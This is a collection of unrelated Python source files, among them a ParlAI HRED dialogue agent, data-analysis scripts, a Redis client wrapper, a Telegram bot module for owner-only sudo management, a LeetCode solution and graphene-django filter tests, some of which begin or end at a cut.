                print("Ground truth {} {} \n".format(gt, get_sent_ll(u3[k, :].unsqueeze(0), u3_lens[k:k+1], model, criteria, final_session_o)))
            else:
                print(gt[0], "|", pt[0][0])
    model.dec.set_teacher_forcing(cur_tc)
    fout.close()
def calc_valid_loss(data_loader, criteria, model):
    """Returns the per-token validation loss (exp of this is perplexity).

    Temporarily switches the model to eval mode with teacher forcing on,
    and restores both on exit.
    """
    model.eval()
    cur_tc = model.dec.get_teacher_forcing()
    model.dec.set_teacher_forcing(True)
    # we want to find the perplexity or likelihood of the provided sequence
    valid_loss, num_words = 0, 0
    for i_batch, sample_batch in enumerate(tqdm(data_loader)):
        preds, lmpreds = model(sample_batch)
        u3 = sample_batch[4]
        if use_cuda:
            u3 = u3.cuda()
        # Shifted next-token prediction, flattened for the criterion.
        preds = preds[:, :-1, :].contiguous().view(-1, preds.size(2))
        u3 = u3[:, 1:].contiguous().view(-1)
        # do not include the lM loss, exp(loss) is perplexity
        loss = criteria(preds, u3)
        # 10003 is the pad id; `.data[0]` is the legacy torch scalar access.
        num_words += u3.ne(10003).long().sum().data[0]
        valid_loss += loss.data[0]
    model.train()
    model.dec.set_teacher_forcing(cur_tc)
    return valid_loss/num_words
def data_to_seq():
    """Converts an external eval source file into token-id sequences.

    Reads the shared MovieTriples vocabulary, maps every line of the eval
    file to ids (1 = <s>, 2 = </s>, 0 = unknown) and pickles the result
    to 'CustomTest.pkl'.
    """
    # we use a common dict for all test, train and validation
    _dict_file = '/home/harshals/hed-dlg/Data/MovieTriples/Training.dict.pkl'
    with open(_dict_file, 'rb') as fp2:
        dict_data = pickle.load(fp2)
    # Entries look like ('</s>', 2, 588827, 785135): token, id, counts —
    # ids appear to be assigned by frequency.
    inv_dict, vocab_dict = {}, {}
    for tok, tok_id, _, _ in dict_data:
        inv_dict[tok_id] = tok
        vocab_dict[tok] = tok_id
    _file = '/data2/chatbot_eval_issues/results/AMT_NCM_Test_NCM_Joao/neural_conv_model_eval_source.txt'
    all_seqs = []
    with open(_file, 'r') as fp:
        for lin in fp.readlines():
            body = [vocab_dict.get(wrd, 0) for wrd in lin.split(" ")]
            all_seqs.append([1] + body + [2])
    with open('CustomTest.pkl', 'wb') as handle:
        pickle.dump(all_seqs, handle, protocol=pickle.HIGHEST_PROTOCOL)
# End Harshal code
class HredAgent(TorchGeneratorAgent):
    """ParlAI generator agent wrapping the HRED hierarchical dialogue model.

    Expects episodes whose text contains three '</s>'-separated utterances
    (u1, u2, u3); u3 is the generation target.
    """
    # lm = True
    @classmethod
    def add_cmdline_args(cls, argparser):
        """
        Add command-line arguments specifically for this agent.
        """
        agent = argparser.add_argument_group('HRED Arguments')
        agent.add_argument('-e', dest='epoch', type=int, default=20, help='number of epochs')
        agent.add_argument('-pt', dest='patience', type=int, default=-1, help='validtion patience for early stopping default none')
        agent.add_argument('-tc', dest='teacher', action='store_true', default=False, help='default teacher forcing')
        agent.add_argument('-bi', dest='bidi', action='store_true', default=False, help='bidirectional enc/decs')
        agent.add_argument('-test', dest='test', action='store_true', default=False, help='only test or inference')
        agent.add_argument('-shrd_dec_emb', dest='shrd_dec_emb', action='store_true', default=False, help='shared embedding in/out for decoder')
        agent.add_argument('-btstrp', dest='btstrp', default=None, help='bootstrap/load parameters give name')
        agent.add_argument('-lm', dest='lm', action='store_true', default=False, help='enable a RNN language model joint training as well')
        agent.add_argument('-toy', dest='toy', action='store_true', default=False, help='loads only 1000 training and 100 valid for testing')
        agent.add_argument('-pretty', dest='pretty', action='store_true', default=False, help='pretty print inference')
        agent.add_argument('-mmi', dest='mmi', action='store_true', default=False, help='Using the mmi anti-lm for ranking beam')
        agent.add_argument('-drp', dest='drp', type=float, default=0.3, help='dropout probability used all throughout')
        agent.add_argument('-nl', dest='num_lyr', type=int, default=1, help='number of enc/dec layers(same for both)')
        agent.add_argument('-lr', dest='lr', type=float, default=0.001, help='learning rate for optimizer')
        agent.add_argument('-bs', dest='bt_siz', type=int, default=100, help='batch size')
        agent.add_argument('-bms', dest='beam', type=int, default=1, help='beam size for decoding')
        # NOTE(review): vocab_size default is 1008 here but 10005 in the
        # standalone get_args() — confirm which is intended.
        agent.add_argument('-vsz', dest='vocab_size', type=int, default=1008, help='size of vocabulary')
        agent.add_argument('-esz', dest='emb_size', type=int, default=300, help='embedding size enc/dec same')
        agent.add_argument('-uthid', dest='ut_hid_size', type=int, default=600, help='encoder utterance hidden state')
        agent.add_argument('-seshid', dest='ses_hid_size', type=int, default=1200, help='encoder session hidden state')
        agent.add_argument('-dechid', dest='dec_hid_size', type=int, default=600, help='decoder hidden state')
        super(HredAgent, cls).add_cmdline_args(argparser)
        return agent
    @staticmethod
    def model_version():
        """
        Return current version of this model, counting up from 0.

        Models may not be backwards-compatible with older versions. Version 1 split from
        version 0 on Aug 29, 2018. Version 2 split from version 1 on Nov 13, 2018 To use
        version 0, use --model legacy:seq2seq:0 To use version 1, use --model
        legacy:seq2seq:1 (legacy agent code is located in parlai/agents/legacy_agents).
        """
        return 2
    def __init__(self, opt, shared=None):
        """
        Set up model.
        """
        super().__init__(opt, shared)
        self.id = 'HRED'
    def build_model(self, states=None):
        """
        Initialize model, override to change model setup.
        """
        opt = self.opt
        if not states:
            states = {}
        # HRED expects attribute-style options; build a namedtuple type
        # whose fields are exactly the opt dict's keys.
        options_type = namedtuple('Options', ' '.join(list(opt.keys())))
        # import pdb; pdb.set_trace()
        model = HRED(options_type(**opt))
        model.dec.set_tc_ratio(0.0)  # Let's not use teacher forcing
        if opt.get('dict_tokenizer') == 'bpe' and opt['embedding_type'] != 'random':
            print('skipping preinitialization of embeddings for bpe')
        elif not states and opt['embedding_type'] != 'random':
            # `not states`: only set up embeddings if not loading model
            self._copy_embeddings(model.decoder.lt.weight, opt['embedding_type'])
            if opt['lookuptable'] in ['unique', 'dec_out']:
                # also set encoder lt, since it's not shared
                self._copy_embeddings(
                    model.encoder.lt.weight, opt['embedding_type'], log=False
                )
        if states:
            # set loaded states if applicable
            model.load_state_dict(states['model'])
        if opt['embedding_type'].endswith('fixed'):
            print('Seq2seq: fixing embedding weights.')
            model.decoder.lt.weight.requires_grad = False
            model.encoder.lt.weight.requires_grad = False
            if opt['lookuptable'] in ['dec_out', 'all']:
                model.output.weight.requires_grad = False
        return model
    def build_criterion(self):
        """Returns the token-level loss; 'none' reduction so compute_loss
        can normalize per example."""
        # set up criteria
        if self.opt.get('numsoftmax', 1) > 1:
            return nn.NLLLoss(ignore_index=self.NULL_IDX, reduction='none')
        else:
            return nn.CrossEntropyLoss(ignore_index=self.NULL_IDX, reduction='none')
    def compute_loss(self, batch, return_output=False):
        """
        Compute and return the loss for the given batch.

        Easily overridable for customized loss functions.

        If return_output is True, the full output from the call to self.model()
        is also returned, via a (loss, model_output) pair.
        """
        # print('Computing loss on batch', batch['u1'].shape)
        if batch.label_vec is None:
            raise ValueError('Cannot compute loss without a label.')
        model_output = self.model(self._model_input(batch))
        scores, preds, *_ = model_output
        # import pdb; pdb.set_trace()
        # Recompute greedy predictions from the scores for token accuracy.
        preds = torch.argmax(scores, dim=2)
        score_view = scores.view(-1, scores.size(-1))
        loss = self.criterion(score_view, batch.label_vec.view(-1))
        # Sum per-example over time steps.
        loss = loss.view(scores.shape[:-1]).sum(dim=1)
        # save loss to metrics
        notnull = batch.label_vec.ne(self.NULL_IDX)
        target_tokens = notnull.long().sum(dim=-1)
        correct = ((batch.label_vec == preds) * notnull).sum(dim=-1)
        self.record_local_metric('loss', AverageMetric.many(loss, target_tokens))
        self.record_local_metric('ppl', PPLMetric.many(loss, target_tokens))
        self.record_local_metric(
            'token_acc', AverageMetric.many(correct, target_tokens)
        )
        # actually do backwards loss
        loss = loss.sum()
        loss /= target_tokens.sum()  # average loss per token
        if return_output:
            return (loss, model_output)
        else:
            return loss
    def train_step(self, batch):
        """Skips batches that batchify() rejected (empty Batch, no labels)."""
        if 'label_vec' not in batch or batch['label_vec'] is None:
            return
        super().train_step(batch)
    def _dummy_batch(self, batchsize, maxlen):
        """
        Create a dummy batch.

        This is used to preinitialize the cuda buffer, or otherwise force a
        null backward pass after an OOM.

        If your model uses additional inputs beyond text_vec and label_vec,
        you will need to override it to add additional fields.

        NOTE(review): unconditionally calls .cuda(), so this assumes a GPU
        is present — verify before running on CPU.
        """
        b = Batch(
            text_vec=torch.ones(batchsize, maxlen).long().cuda(),
            label_vec=torch.ones(batchsize, maxlen).long().cuda(),
            text_lengths=[maxlen] * batchsize,
        )
        # HRED consumes the three utterance fields; reuse the dummy vecs.
        b['u1'] = b['text_vec']
        b['u2'] = b['text_vec']
        b['u3'] = b['text_vec']
        b['u1_lens'] = b['text_lengths']
        b['u2_lens'] = b['text_lengths']
        b['u3_lens'] = b['text_lengths']
        return b
    def batchify(self, *args, **kwargs):
        """
        Override batchify options for seq2seq.

        Splits each observation's text into (u1, u2, u3) on '</s>' markers
        during training; at inference the last two history turns are used.
        Returns an empty Batch() for malformed examples.
        """
        kwargs['sort'] = True  # need sorted for pack_padded
        b = super().batchify(*args, **kwargs)
        u1s, u2s, u3s = [], [], []
        if self.is_training:
            for observation in b['observations']:
                tvec = observation['text_vec']
                # Positions of the '</s>' separators inside the text vector.
                indices = [i for i, x in enumerate(tvec) if x == self.dict['</s>']]
                try:
                    u1s.append(torch.LongTensor(tvec[1:indices[0]]).reshape(-1))
                    u2s.append(torch.LongTensor(tvec[indices[0]+2:indices[1]]).reshape(-1))
                    u3s.append(torch.LongTensor(tvec[indices[1]+2:indices[2]]).reshape(-1))
                except IndexError:
                    return Batch()
                # in case of invalid triple
                if len(u1s[-1]) <= 0 or len(u2s[-1]) <= 0 or len(u3s[-1]) <= 0:
                    return Batch()
        else:
            # Inference: build the triple from dialogue history; u3 is a
            # placeholder token since the target is unknown.
            if len(self.history.history_vecs) >= 2:
                u1s = [self.history.history_vecs[-2]]
                u2s = [self.history.history_vecs[-1]]
                u3s = [[self.dict['hello']]]
            elif len(self.history.history_vecs) >= 1:
                u1s = [[self.dict['hello']]]
                u2s = [self.history.history_vecs[-1]]
                u3s = [[self.dict['hello']]]
        # print('u1s',len(u1s),'u2s',len(u2s),'u3s',len(u3s))
        # print('u1s lens ', [x.size(0) for x in u1s])
        # print('u2s lens ', [x.size(0) for x in u2s])
        # print('u3s lens ', [x.size(0) for x in u3s])
        u1, u1_lens = self._pad_tensor(u1s)
        u2, u2_lens = self._pad_tensor(u2s)
        u3, u3_lens = self._pad_tensor(u3s)
        # print('u1 ITEM ', u1.max().item())
        # print('u2 ITEM ', u2.max().item())
        # print('u3 ITEM ', u3.max().item())
        b['label_vec'] = u3
        b['u1'] = u1
        b['u1_lens'] = u1_lens
        b['u2'] = u2
        b['u2_lens'] = u2_lens
        b['u3'] = u3
        b['u3_lens'] = u3_lens
        if u1 is None or u2 is None or u3 is None:
            return Batch()
        return b
    def _set_text_vec(self, obs, history, truncate):
        """No HRED-specific behavior; defers to the parent implementation."""
        return super()._set_text_vec(obs, history, truncate)
    def _model_input(self, batch):
        """Packs the utterance triple (tensors + lengths) for HRED.forward."""
        u1, u2, u3 = batch['u1'], batch['u2'], batch['u3']
        u1_lens, u2_lens, u3_lens = batch['u1_lens'], batch['u2_lens'], batch['u3_lens']
        return (u1, u1_lens, u2, u2_lens, u3, u3_lens)
    def _encoder_input(self, batch):
        """Context-only input (u1, u2) reshaped to batch size 1."""
        return (torch.LongTensor(batch.u1).reshape(1,-1), torch.LongTensor(batch.u2).reshape(1,-1), )
    def _generate(self, batch, beam_size, max_ts):
        """
        Generate an output with beam search.

        Depending on the options, this may perform greedy/topk/nucleus generation.

        :param Batch batch:
            Batch structure with input and labels
        :param int beam_size:
            Size of each beam during the search
        :param int max_ts:
            the maximum length of the decoded sequence
        :return:
            tuple (beam_pred_scores, n_best_pred_scores, beams)

            - beam_preds_scores: list of (prediction, score) pairs for each sample in
              Batch
            - n_best_preds_scores: list of n_best list of tuples (prediction, score)
              for each sample from Batch
            - beams :list of Beam instances defined in Beam class, can be used for any
              following postprocessing, e.g. dot logging.
        """
        model = self.model
        u1, u1_lens, u2, u2_lens, u3, u3_lens = self._model_input(batch)
        bt_siz = u1.size(0)
        if use_cuda:
            u1 = u1.cuda()
            u2 = u2.cuda()
            u3 = u3.cuda()
        # Encode each utterance, then the session over their sequence.
        o1, o2 = model.base_enc((u1, u1_lens)), model.base_enc((u2, u2_lens))
        qu_seq = torch.cat((o1, o2), 1)
        # if we need to decode the intermediate queries we may need the hidden states
        final_session_o = model.ses_enc(qu_seq)
        # forward(self, ses_encoding, x=None, x_lens=None, beam=5 ):
        # NOTE(review): only the last sample's `sent` is returned — looks
        # like per-sample outputs are dropped for bt_siz > 1; verify.
        for k in range(bt_siz):
            sent = self.generate(final_session_o[k, :, :].unsqueeze(0), beam_size)
            # pt = tensor_to_sent(sent, inv_dict)
            # # greedy true for below because only beam generates a tuple of sequence and probability
            # gt = tensor_to_sent(u3[k, :].unsqueeze(0).data.cpu().numpy(), inv_dict, True)
            # fout.write(str(gt[0]) + " | " + str(pt[0][0]) + "\n")
            # fout.flush()
            # if not options.pretty:
            #     print(pt)
            #     print("Ground truth {} {} \n".format(gt, get_sent_ll(u3[k, :].unsqueeze(0), u3_lens[k:k+1], model, criteria, final_session_o)))
            # else:
            #     print(gt[0], "|", pt[0][0])
        return sent, sent
    def generate(self, ses_encoding, beam):
        """Beam search over the decoder given a session encoding.

        Candidates are (token_ids, log_prob, lm_log_prob) triples; id 1 is
        the start token and id 2 terminates a hypothesis.

        NOTE(review): `Variable(..., volatile=True)` and `.data[...]` are
        legacy torch<=0.3 APIs — presumably pinned to an old version.
        """
        diversity_rate = 2
        antilm_param = 10
        n_candidates, final_candids = [], []
        candidates = [([1], 0, 0)]
        gen_len, max_gen_len = 1, 20
        # we provide the top k options/target defined each time
        while gen_len <= max_gen_len:
            for c in candidates:
                seq, pts_score, pt_score = c[0], c[1], c[2]
                _target = Variable(torch.LongTensor([seq]), volatile=True)
                dec_o, dec_lm = self.model.dec([ses_encoding, _target, [len(seq)]])
                # import pdb; pdb.set_trace()
                dec_o = dec_o[:, :, :-1]
                op = F.log_softmax(dec_o, 2, 5)
                # Distribution over the next token only.
                op = op[:, -1, :]
                topval, topind = op.topk(beam, 1)
                if self.model.options.lm:
                    dec_lm = dec_lm[:, :, :-1]
                    lm_op = F.log_softmax(dec_lm, 2, 5)
                    lm_op = lm_op[:, -1, :]
                for i in range(beam):
                    ctok, cval = topind.data[0, i], topval.data[0, i]
                    if self.model.options.lm:
                        # Anti-LM penalty only within the first
                        # `antilm_param` steps.
                        uval = lm_op.data[0, ctok]
                        if dec_lm.size(1) > antilm_param:
                            uval = 0.0
                    else:
                        uval = 0.0
                    # Token 2 (</s>) finalizes the hypothesis.
                    if ctok == 2:
                        list_to_append = final_candids
                    else:
                        list_to_append = n_candidates
                    list_to_append.append((seq + [ctok], pts_score + cval - diversity_rate*(i+1), pt_score + uval))
            # Keep the `beam` best continuations for the next step.
            n_candidates.sort(key=lambda temp: sort_key(temp, self.model.options.mmi), reverse=True)
            candidates = copy.copy(n_candidates[:beam])
            n_candidates[:] = []
            gen_len += 1
        final_candids = final_candids + candidates
        final_candids = [(x, y) for x,y, _ in final_candids]
        # final_candids = [(temp, sort_key(temp, self.model.options.mmi)) for temp in final_candids]
        final_candids = sorted(final_candids, key=lambda x: -x[1])
        return final_candids[:beam]
    def state_dict(self):
        """
        Get the model states for saving.

        Overriden to include longest_label
        """
        states = super().state_dict()
        # if hasattr(self.model, 'module'):
        #     states['longest_label'] = self.model.module.longest_label
        # else:
        #     states['longest_label'] = self.model.longest_label
        return states
    def load(self, path):
        """
        Return opt and model states.
        """
        # Map tensors to CPU so GPU checkpoints load on CPU-only hosts.
        states = torch.load(path, map_location=lambda cpu, _: cpu)
        # set loaded states if applicable
        self.model.load_state_dict(states['model'])
        if 'longest_label' in states:
            self.model.longest_label = states['longest_label']
        return states
    def is_valid(self, obs):
        """Rejects empty text_vec observations (with a one-time warning)."""
        normally_valid = super().is_valid(obs)
        if not normally_valid:
            # shortcut boolean evaluation
            return normally_valid
        contains_empties = obs['text_vec'].shape[0] == 0
        if self.is_training and contains_empties:
            warn_once(
                'seq2seq got an empty input sequence (text_vec) during training. '
                'Skipping this example, but you should check your dataset and '
                'preprocessing.'
            )
        elif not self.is_training and contains_empties:
            warn_once(
                'seq2seq got an empty input sequence (text_vec) in an '
                'evaluation example! This may affect your metrics!'
            )
        return not contains_empties
|
#!/usr/bin/env python3
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from time import time
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from user_processing import get_users
from place_processing import get_places
from transforms import transform_coords, transform_payments, transform_cuisines
def example_all_ratings():
    """Trains random forests on the merged restaurant-ratings data and
    reports mean absolute error over 100 random splits, then plots the
    top-10 feature importances of the last fitted model."""
    seed = int(time())  # 42
    # Seeding np.random also fixes sklearn's default RNG for the splits.
    np.random.seed(seed)
    # load dataframes
    user_df = get_users()
    places_df = get_places()
    ratings_df = pd.read_csv("data/rating_final.csv", encoding='utf-8')\
        .drop(columns=['food_rating', 'service_rating'])
    # merge all tables together
    df = ratings_df.merge(user_df, how='inner', on='userID') \
        .merge(places_df, how='inner', on='placeID')
    df = transform_cuisines(df)
    df = transform_payments(df)
    df = transform_coords(df)
    # drop row identifiers
    df.drop(columns=['userID', 'placeID'], inplace=True)
    x = df.drop(columns=['rating'])
    y = df.rating
    means = []
    # Repeat with fresh random splits to estimate error variance.
    for i in range(100):
        # split dataset
        xtrain, xtest, ytrain, ytest = train_test_split(x, y, train_size=0.9)
        # train classifier
        clf = RandomForestClassifier(n_estimators=50)
        clf.fit(xtrain, ytrain)
        # evaluate classifier
        predictions = clf.predict(xtest)
        errors = np.array(abs(predictions - ytest))
        mean = np.mean(errors.flatten())
        means.append(mean)
    mean = np.mean(means)
    std = np.std(means)
    print("Mean:", mean, "\nStd:", std)
    print(means)
    # print('Mean Absolute Error: \"', round(np.mean(errors), 2), '\".')
    # print(list((xtest, predictions, ytest))[:10])
    # NOTE(review): importances come from the final loop iteration's model
    # only, not an average over all 100 fits.
    features = x.columns
    importances = clf.feature_importances_
    indices = np.argsort(importances)
    # filter by importances > 0, keep the 10 largest
    features = np.array([features[index] for index in indices if importances[index] > 0])[-10:]
    importances = np.array([importances[index] for index in indices if importances[index] > 0])[-10:]
    # show feature importance plot
    plt.barh(range(len(importances)), importances[:], color='b', align='center')
    plt.yticks(range(len(features)), features)
    # plt.title('Feature Importances')
    # plt.xlabel('Relative Importance')
    plt.tight_layout()
    plt.show()
example_all_ratings()
|
import pandas as pd

# Per-sample sequencing depth proxy: high-quality inserts per sample.
computed = pd.read_table('cold/sample.computed.tsv', index_col=0)
mapped = computed.insertsHQ
# NOTE(review): `squeeze=True` in read_table is deprecated in newer pandas.
biome = pd.read_table('../../gmgc.analysis/cold/biome.txt', squeeze=True, index_col=0)
# NOTE(review): `nthreads` was renamed `use_threads` in newer pandas/pyarrow.
bactNOG = pd.read_feather('tables/bactNOGS.unique.feather', nthreads=24)
bactNOG.set_index('index', inplace=True)
# Presence/absence of each bactNOG orthologous group per sample.
bactDetect = bactNOG > 0
# Keep only samples with more than 1e6 mapped HQ inserts.
bsel = bactDetect.T[mapped > 1e6]
biome = biome.reindex(bsel.index)
# Fraction of samples in which each OG is detected, per biome.
bactprevs = {}
for b in set(biome.values):
    bactprevs[b] = bsel.loc[biome==b].mean()
    print(f'Done {b}')
bactprevs['all'] = bsel.mean()
bactprevs['genomes' ] = pd.read_table('outputs/genomic.relative.txt', index_col=0, squeeze=True)
bactprevs = pd.DataFrame(bactprevs)
bactprevs.to_csv('tables/bactNOGS.prevalence.tsv', sep='\t')
# Dead exploratory code (looks like pasted interactive-session history);
# kept for reference but never executed.
# NOTE(review): inside this block `bp` is used before it is assigned on the
# first line — it would fail if ever enabled.
if False:
    rare = bp.genomes <.1
    bp = bactprevs
    rare = bp.genomes <.1
    for c in bp.columns:
        print(c,(bp[c] > .9).sum(), (rare & (bp[c] > .9)).sum())
    ball = bsel.mean()
    commcore = ball[((ball > .9) & rare)].copy()
    commcore.sort_values()
    commcore = ball[((ball > .9) & rare)].copy().sort_values()
    info = pd.read_table('bactNOG.annotations.tsv.gz', header=None, index_col=1)
    info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
    urare =info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
    info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])].values
    info.loc[commcore.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
    bp['genome'][commcore.index]
    bp['genomes'][commcore.index]
    genomes = bp['genomes'][commcore.index]
    data = pd.DataFrame({'metagenomes': commcore, 'genomes' : bp.genomes[commcore.index]})
    data = data.sort_values(by='metagenomes', ascending=False)
    info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])]
    info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])][5]
    info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])][5].values
    data['name'] = info.loc[data.index.map(lambda c: 'ENOG41'+c.split('@')[0])][5].values
    open('test.html', 'wt').write(data.to_html())
|
'''The :mod:`stdnet.backends.redisb.client` implements several extensions
to the standard redis client in redis-py_
Client
~~~~~~~~~~~~~~
.. autoclass:: Redis
:members:
:member-order: bysource
Prefixed Client
~~~~~~~~~~~~~~~~~~
.. autoclass:: PrefixedRedis
:members:
:member-order: bysource
RedisScript
~~~~~~~~~~~~~~~
.. autoclass:: RedisScript
:members:
:member-order: bysource
'''
import os
import io
import socket
from copy import copy
from .extensions import RedisExtensionsMixin, redis, BasePipeline
from .prefixed import PrefixedRedisMixin
class Redis(RedisExtensionsMixin, redis.StrictRedis):
    '''Extended StrictRedis client (see module docstring).'''
    @property
    def encoding(self):
        '''Character encoding configured on the connection pool
        (defaults to utf-8).'''
        return self.connection_pool.connection_kwargs.get('encoding', 'utf-8')
    def address(self):
        '''Return the ``(host, port)`` pair the connection pool targets.'''
        kw = self.connection_pool.connection_kwargs
        return (kw['host'], kw['port'])
    def prefixed(self, prefix):
        '''Return a new :class:`PrefixedRedis` client.
        '''
        return PrefixedRedis(self, prefix)
    def pipeline(self, transaction=True, shard_hint=None):
        '''Return a :class:`Pipeline` bound to this client.'''
        return Pipeline(
            self,
            transaction,
            shard_hint)
class PrefixedRedis(PrefixedRedisMixin, Redis):
    '''Concrete prefixed client (behavior provided by PrefixedRedisMixin;
    see module docstring).'''
    pass
class Pipeline(BasePipeline, Redis):
    '''Pipeline sharing the parent client's connection pool and
    response callbacks.'''
    def __init__(self, client, transaction, shard_hint):
        self.client = client
        # Reuse the parent's callbacks so replies decode identically.
        self.response_callbacks = client.response_callbacks
        self.transaction = transaction
        self.shard_hint = shard_hint
        self.watching = False
        self.connection = None
        self.reset()
    @property
    def connection_pool(self):
        '''Connection pool of the client this pipeline was created from.'''
        return self.client.connection_pool
    @property
    def is_pipeline(self):
        '''Always True; lets callers distinguish pipelines from clients.'''
        return True
|
import html
from typing import List
from telegram import Update, Bot
from telegram.ext import CommandHandler, Filters
from telegram.ext.dispatcher import run_async
from tg_bot import dispatcher, SUDO_USERS, OWNER_USERNAME, OWNER_ID
from tg_bot.modules.helper_funcs.extraction import extract_user
from tg_bot.modules.helper_funcs.chat_status import bot_admin
@bot_admin
@run_async
def sudopromote(bot: Bot, update: Update, args: List[str]):
    """Add the referenced user to SUDO_USERS and persist the id to disk."""
    message = update.effective_message
    banner = update.effective_user
    user_id = extract_user(message, args)
    # Guard clauses: no target, target is the owner, or already sudo.
    if not user_id:
        message.reply_text("You don't seem to be referring to a user.")
        return ""
    if int(user_id) == OWNER_ID:
        message.reply_text("The specified user is my owner! No need add him to SUDO_USERS list!")
        return ""
    if int(user_id) in SUDO_USERS:
        message.reply_text("The user is already a sudo user.")
        return ""
    # Persist first, then mutate the in-memory list.
    with open("sudo_users.txt", "a") as sudo_file:
        sudo_file.write("{}\n".format(user_id))
    SUDO_USERS.append(user_id)
    message.reply_text("Succefully added to SUDO user list!")
    return ""
@bot_admin
@run_async
def sudodemote(bot: Bot, update: Update, args: List[str]):
    """Remove the referenced user from SUDO_USERS and rewrite the persisted file.

    Replies with an explanatory message and returns "" in every case.
    """
    message = update.effective_message
    user_id = extract_user(message, args)
    if not user_id:
        message.reply_text("You don't seem to be referring to a user.")
        return ""
    if int(user_id) == OWNER_ID:
        message.reply_text("The specified user is my owner! I won't remove him from SUDO_USERS list!")
        return ""
    if user_id not in SUDO_USERS:
        message.reply_text("{} is not a sudo user".format(user_id))
        return ""
    # BUG FIX: read the file through a context manager — the original opened
    # it inside a list comprehension and never closed the handle.
    with open("sudo_users.txt") as sudo_file:
        users = [line.rstrip('\n') for line in sudo_file]
    # Rewrite the file without the demoted user's id.
    with open("sudo_users.txt", "w") as sudo_file:
        for user in users:
            if not int(user) == user_id:
                sudo_file.write(str(user) + "\n")
    SUDO_USERS.remove(user_id)
    message.reply_text("Succefully removed from SUDO user list!")
    return ""
__help__ = """
*Bot owner only:*
- /sudopromote: promotes the user to SUDO USER
- /sudodemote: demotes the user from SUDO USER
"""
# Name shown for this module in the bot's help menu.
__mod_name__ = "SUDO"
# Both commands are owner-only: Filters.user(OWNER_ID) drops all other senders.
SUDOPROMOTE_HANDLER = CommandHandler("sudopromote", sudopromote, pass_args=True, filters=Filters.user(OWNER_ID))
SUDODEMOTE_HANDLER = CommandHandler("sudodemote", sudodemote, pass_args=True, filters=Filters.user(OWNER_ID))
dispatcher.add_handler(SUDOPROMOTE_HANDLER)
dispatcher.add_handler(SUDODEMOTE_HANDLER)
|
class Solution:
    def canVisitAllRooms(self, rooms: List[List[int]]) -> bool:
        """Return True if every room is reachable starting from room 0.

        ``rooms[i]`` lists the keys (room indices) found in room i, forming a
        directed graph. Uses an iterative depth-first search, which avoids the
        recursion-depth limit the original recursive version could hit on long
        key chains, and ends with ``all(visited)`` instead of the
        ``if not False in visited`` anti-idiom.
        """
        if not rooms:  # no rooms at all: vacuously true (original crashed)
            return True
        visited = [False] * len(rooms)
        visited[0] = True  # we start inside room 0
        stack = [0]
        while stack:
            room = stack.pop()
            for key in rooms[room]:
                if not visited[key]:
                    visited[key] = True
                    stack.append(key)
        return all(visited)
|
from mock import MagicMock
import pytest
from django.db import models
from django.db.models.query import QuerySet
from django_filters import filters
from django_filters import FilterSet
import graphene
from graphene.relay import Node
from graphene_django import DjangoObjectType
from graphene_django.utils import DJANGO_FILTER_INSTALLED
from ...compat import ArrayField
# Collected pytest marks for this module; populated below when the optional
# django_filters integration cannot be imported.
pytestmark = []
if DJANGO_FILTER_INSTALLED:
    from graphene_django.filter import DjangoFilterConnectionField
else:
    # Skip every test in this module when django_filters is unavailable.
    pytestmark.append(
        pytest.mark.skipif(
            True, reason="django_filters not installed or not compatible"
        )
    )
# Shared mutable store the mocked queryset (defined in the Query fixture)
# filters in place of a real database.
STORE = {"events": []}
@pytest.fixture
def Event():
    """Minimal Django model with an ArrayField, declared lazily per test."""
    class Event(models.Model):
        name = models.CharField(max_length=50)
        tags = ArrayField(models.CharField(max_length=50))
    return Event
@pytest.fixture
def EventFilterSet(Event):
    """FilterSet adding array `contains` and `overlap` lookups on Event.tags."""
    from django.contrib.postgres.forms import SimpleArrayField

    class ArrayFilter(filters.Filter):
        # Form field used to parse the incoming filter value into a list
        # (presumably delimiter-separated — see django.contrib.postgres docs).
        base_field_class = SimpleArrayField

    class EventFilterSet(FilterSet):
        class Meta:
            model = Event
            fields = {
                "name": ["exact"],
            }

        # Explicitly declared filters targeting the `tags` ArrayField.
        tags__contains = ArrayFilter(field_name="tags", lookup_expr="contains")
        tags__overlap = ArrayFilter(field_name="tags", lookup_expr="overlap")

    return EventFilterSet
@pytest.fixture
def EventType(Event, EventFilterSet):
    """Relay node type for Event wired to the custom filterset above."""
    class EventType(DjangoObjectType):
        class Meta:
            model = Event
            interfaces = (Node,)
            filterset_class = EventFilterSet
    return EventType
@pytest.fixture
def Query(Event, EventType):
    """Query type whose resolver returns a mocked QuerySet.

    The mock emulates just enough of the QuerySet API (all / filter / none /
    count / __getitem__) for DjangoFilterConnectionField, filtering the
    in-memory STORE["events"] list instead of hitting a database.
    """
    class Query(graphene.ObjectType):
        events = DjangoFilterConnectionField(EventType)

        def resolve_events(self, info, **kwargs):
            # Fresh fixture data for every resolution.
            events = [
                Event(name="Live Show", tags=["concert", "music", "rock"],),
                Event(name="Musical", tags=["movie", "music"],),
                Event(name="Ballet", tags=["concert", "dance"],),
            ]
            STORE["events"] = events
            m_queryset = MagicMock(spec=QuerySet)
            m_queryset.model = Event

            def filter_events(**kwargs):
                # `contains`: every requested tag must be present on the event.
                if "tags__contains" in kwargs:
                    STORE["events"] = list(
                        filter(
                            lambda e: set(kwargs["tags__contains"]).issubset(
                                set(e.tags)
                            ),
                            STORE["events"],
                        )
                    )
                # `overlap`: at least one requested tag must match.
                if "tags__overlap" in kwargs:
                    STORE["events"] = list(
                        filter(
                            lambda e: not set(kwargs["tags__overlap"]).isdisjoint(
                                set(e.tags)
                            ),
                            STORE["events"],
                        )
                    )

            def mock_queryset_filter(*args, **kwargs):
                filter_events(**kwargs)
                return m_queryset

            def mock_queryset_none(*args, **kwargs):
                STORE["events"] = []
                return m_queryset

            def mock_queryset_count(*args, **kwargs):
                return len(STORE["events"])

            # Wire up the QuerySet surface used by the connection field.
            m_queryset.all.return_value = m_queryset
            m_queryset.filter.side_effect = mock_queryset_filter
            m_queryset.none.side_effect = mock_queryset_none
            m_queryset.count.side_effect = mock_queryset_count
            # NOTE(review): bound to the *original* events list; later filters
            # rebind STORE["events"] but not this __getitem__ — confirm intent.
